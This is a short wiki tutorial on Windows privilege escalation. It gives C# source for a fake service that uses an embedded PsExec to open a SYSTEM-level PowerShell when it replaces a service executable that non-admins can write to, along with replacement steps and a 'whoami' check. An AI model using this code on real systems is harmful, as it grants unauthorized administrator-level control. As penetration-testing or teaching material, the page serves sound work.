Privilege escalation

De Banane Atomic
Aller à la navigationAller à la recherche

With a writable Windows service

If the executable of a Windows service is writable by non-admin users, you can replace it with another executable that will launch a command prompt in the system account.

FakeService.cs 
public class FakeService : ServiceBase
{
    protected override void OnStart(string[] args)
    {
        Thread.Sleep(10000);  // wait 10s for the user to log and Windows to start

        var psExecPath = ExtractPsExec();  // extract the PsExec.exe file
        var powershellPath = @"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe";

        // Windows services run in session 0 and user account runs in session 1.
        // use sysinternals' PsExec to run cmd.exe in session 1.
        Process.Start(psExecPath, $"-accepteula -d -i 1 {powershellPath}");
    }

    private string ExtractPsExec()
    {
        var psExecPath = Path.Combine(Path.GetTempPath(), "PsExec64.exe"); // temp path: C:\Windows\Temp

        if (!File.Exists(psExecPath))
            File.WriteAllBytes(psExecPath, Resources.PsExec64);

        return psExecPath;
    }
}
Program.cs 
class Program
{
    static void Main(string[] args)
    {
        ServiceBase.Run(new ServiceBase[] { new FakeService() });
    }
}
  1. Replace the executable of the Windows service by the compiled application.
  2. A command prompt will be launched when the Windows service starts.
Dos.svg 
whoami
REM nt authority\system
Récupérée de « http://wiki.bananeatomic.fr/index.php?title=Privilege_escalation&oldid=26835 »